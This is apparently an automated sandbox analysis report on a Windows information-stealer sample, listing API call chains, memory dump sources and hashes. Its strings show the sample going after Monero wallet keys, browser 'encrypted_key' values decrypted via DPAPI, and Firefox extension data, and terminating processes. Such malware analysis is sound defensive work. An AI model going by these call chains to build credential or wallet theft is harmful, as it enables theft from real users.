                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001C12B4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C12BB
                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 001C12D7
                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 001C12F5
                      • RegCloseKey.ADVAPI32(?), ref: 001C12FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                      • Instruction ID: b9860bd818a87fb5ca3d4598247d5803f0042beabe27c9b7ad51fde18877dd64
                      • Opcode Fuzzy Hash: ed30376f409ac10d664352fd2aee6b983602db6b78e3fbba452902a446c9ce0d
                      • Instruction Fuzzy Hash: BC0131BAA40308BBDB00DFE0DD49FAEB7B8EB48701F108169FA05A7280D6709A158F55
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 001D6663
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D6726
                      • ExitProcess.KERNEL32 ref: 001D6755
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                      • String ID: <
                      • API String ID: 1148417306-4251816714
                      • Opcode ID: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                      • Instruction ID: 56becbcbe0349c3f8e53dd0b736f0491d0f0dbe23b6be2fc08a24b066e3b2a03
                      • Opcode Fuzzy Hash: 3a2dc46ea4de034623795cd3e13fcf3ee75a70a9e310438fd0a6209be461c4af
                      • Instruction Fuzzy Hash: 05312FB1801218ABDB14EB50DD91FDE7778AF54300F80519AF20977291DF746B48CF5A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E28,00000000,?), ref: 001D882F
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8836
                      • wsprintfA.USER32 ref: 001D8850
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                      • String ID: %dx%d
                      • API String ID: 1695172769-2206825331
                      • Opcode ID: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                      • Instruction ID: c5dc50422a25573887ff784cdb53f0e527ff25777a1ad9843462e4b32f33afa2
                      • Opcode Fuzzy Hash: f4efc26e46c929e1a8958ef21b7f449abe5ebe9b06b835b6bc7899d17fd2a2cc
                      • Instruction Fuzzy Hash: 762112B2A40308AFDB04DF94DD45FAEBBB8FB48711F104119F605B7280C7799911CBA5
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                      • wsprintfW.USER32 ref: 001D8D78
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateProcesswsprintf
                      • String ID: %hs
                      • API String ID: 769748085-2783943728
                      • Opcode ID: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                      • Instruction ID: c13457c5efcbb89115e05de464f4fe3640a04083dfb19cdf490072a8f501d2aa
                      • Opcode Fuzzy Hash: 6ee118ef627fd8d33aa4a02f19ed9d4cf0bc4348d6b439b433a2ade340de703f
                      • Instruction Fuzzy Hash: 70E0E675A50308BBD710EB94DD09E5D77B8EB44701F004164FD0997240DA719E549B56
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CA2E1
                      • lstrlen.KERNEL32(00000000,00000000), ref: 001CA3FF
                      • lstrlen.KERNEL32(00000000), ref: 001CA6BC
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • DeleteFileA.KERNEL32(00000000), ref: 001CA743
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                      • Instruction ID: 186d37cb0c1835077ff7e1d78c9ddefd24c0eed69cdff051900fa2988497e9a9
                      • Opcode Fuzzy Hash: 259b1c64a67e407d3d793614e657c8e221c73d3e58bffd371ab127388ed2d1e9
                      • Instruction Fuzzy Hash: 3CE115728101589BCB05FBA4DDA2EEE733CAF34301F90816AF51772191EF306A49DB66
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD481
                      • lstrlen.KERNEL32(00000000), ref: 001CD698
                      • lstrlen.KERNEL32(00000000), ref: 001CD6AC
                      • DeleteFileA.KERNEL32(00000000), ref: 001CD72B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                      • Instruction ID: a0b8a9c972237b710213a3f332199564f1d2eea052f1debd676acfc8f1644d46
                      • Opcode Fuzzy Hash: a4df5021301432186e0dfe2ba00fa3da503c8c88d3d3581b89f616024f0fd2ae
                      • Instruction Fuzzy Hash: 659137728101589BCB04FBA4DD92EEE7338AF34301F90416AF50777291EF746A49DB66
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001D8B60: GetSystemTime.KERNEL32(001E0E1A,00E3A280,001E05AE,?,?,001C13F9,?,0000001A,001E0E1A,00000000,?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001D8B86
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 001CD801
                      • lstrlen.KERNEL32(00000000), ref: 001CD99F
                      • lstrlen.KERNEL32(00000000), ref: 001CD9B3
                      • DeleteFileA.KERNEL32(00000000), ref: 001CDA32
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                      • String ID:
                      • API String ID: 211194620-0
                      • Opcode ID: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                      • Instruction ID: 40a0a76525c05511d1a3d783494369c071f9dc1b4606d06323be6419039e7a8c
                      • Opcode Fuzzy Hash: a4c92ca2db307cc0026c4ab93f3f66598d54f794e4b3421cee963da157002055
                      • Instruction Fuzzy Hash: 7B8126729101549BCB04FBA4DD96EEE7338AF34301F90452AF407B7291EF746A09DBA6
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,001E1580,001E0D92), ref: 001CF54C
                      • lstrlen.KERNEL32(00000000), ref: 001CF56B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                      • String ID: ^userContextId=4294967295$moz-extension+++
                      • API String ID: 998311485-3310892237
                      • Opcode ID: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                      • Instruction ID: 27be4091555c17d33ab18a40768bd0ac95e9a3e0449eb25e585e5413360264ee
                      • Opcode Fuzzy Hash: f209d61b540fe866096bc61181816b822377ff93632ff30e084753d76e9480be
                      • Instruction Fuzzy Hash: F7511771D10148ABDB04FBF4DC96DEE7379AF64300F808529F81667291EF346A09DBA6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen
                      • String ID:
                      • API String ID: 367037083-0
                      • Opcode ID: 5714d3e105560443adcd6d573ea74a69d0c96faebdd975ea1f1aa845628f0cb7
                      • Instruction ID: aae13de1d32ba86830497d83ae9d6296b49e02dac1dcb1e5a1dab9b78a7a1b12
                      • Opcode Fuzzy Hash: 5714d3e105560443adcd6d573ea74a69d0c96faebdd975ea1f1aa845628f0cb7
                      • Instruction Fuzzy Hash: 06415F71D10209AFCB04EFE5DC85AEEB774AF58304F40801AE41677390EB75AA45CFA6
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                        • Part of subcall function 001C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                        • Part of subcall function 001C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                        • Part of subcall function 001C99C0: ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                        • Part of subcall function 001C99C0: LocalFree.KERNEL32(001C148F), ref: 001C9A90
                        • Part of subcall function 001C99C0: CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 001C9D39
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9AEF
                        • Part of subcall function 001C9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,001C4EEE,00000000,?), ref: 001C9B01
                        • Part of subcall function 001C9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,001C4EEE,00000000,00000000), ref: 001C9B2A
                        • Part of subcall function 001C9AC0: LocalFree.KERNEL32(?,?,?,?,001C4EEE,00000000,?), ref: 001C9B3F
                        • Part of subcall function 001C9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 001C9B84
                        • Part of subcall function 001C9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 001C9BA3
                        • Part of subcall function 001C9B60: LocalFree.KERNEL32(?), ref: 001C9BD3
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                      • String ID: $"encrypted_key":"$DPAPI
                      • API String ID: 2100535398-738592651
                      • Opcode ID: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                      • Instruction ID: c8ca1c0dd15fb6b29c803d1cfc442054ca7034b35933b3b411e544c8eb8ced78
                      • Opcode Fuzzy Hash: 6c7b82edacc5229b39e627bed0d3bf498dc386a3cf8bd19d95c8dd6ff409370a
                      • Instruction Fuzzy Hash: 33311EB6D10209ABCB14DBE4DC89FEEB7B8AF68304F54451DE906B7241E735DA04CBA1
                      APIs
                      • memset.MSVCRT ref: 001D94EB
                        • Part of subcall function 001D8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,001D951E,00000000), ref: 001D8D5B
                        • Part of subcall function 001D8D50: RtlAllocateHeap.NTDLL(00000000), ref: 001D8D62
                        • Part of subcall function 001D8D50: wsprintfW.USER32 ref: 001D8D78
                      • OpenProcess.KERNEL32(00001001,00000000,?), ref: 001D95AB
                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 001D95C9
                      • CloseHandle.KERNEL32(00000000), ref: 001D95D6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                      • String ID:
                      • API String ID: 3729781310-0
                      • Opcode ID: 46b1f1d1f44547fae6ac93f92aff9f07a11e3ccbd871f7090839718594e1cad8
                      • Instruction ID: b83b54bc3ba82365e2b682939ce3f9c679c5150b405cb169f25d74ac04fae4eb
                      • Opcode Fuzzy Hash: 46b1f1d1f44547fae6ac93f92aff9f07a11e3ccbd871f7090839718594e1cad8
                      • Instruction Fuzzy Hash: 29311C71A003489FDB14DBE0DD49BEDB778EF54300F10856AE506AB284DB78AA89CB56
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001E05B7), ref: 001D86CA
                      • Process32First.KERNEL32(?,00000128), ref: 001D86DE
                      • Process32Next.KERNEL32(?,00000128), ref: 001D86F3
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • CloseHandle.KERNEL32(?), ref: 001D8761
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: same 14 memory dumps as listed above
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                      • String ID:
                      • API String ID: 1066202413-0
                      • Opcode ID: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                      • Instruction ID: c6a55ee32343d2d3f4b868e4634a809381449f8ca4b492df2459d1a09cfcd9e4
                      • Opcode Fuzzy Hash: 94b5717ac8924cc6aec3e945214cdb9fb50577396b3f0a2fb6650cf57d7a8e45
                      • Instruction Fuzzy Hash: 27317C71901258ABCB24EF91CC51FEEB778EF55700F5081AAF50AA22A0DF306E45CFA1
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001E0E00,00000000,?), ref: 001D79B0
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D79B7
                      • GetLocalTime.KERNEL32(?,?,?,?,?,001E0E00,00000000,?), ref: 001D79C4
                      • wsprintfA.USER32 ref: 001D79F3
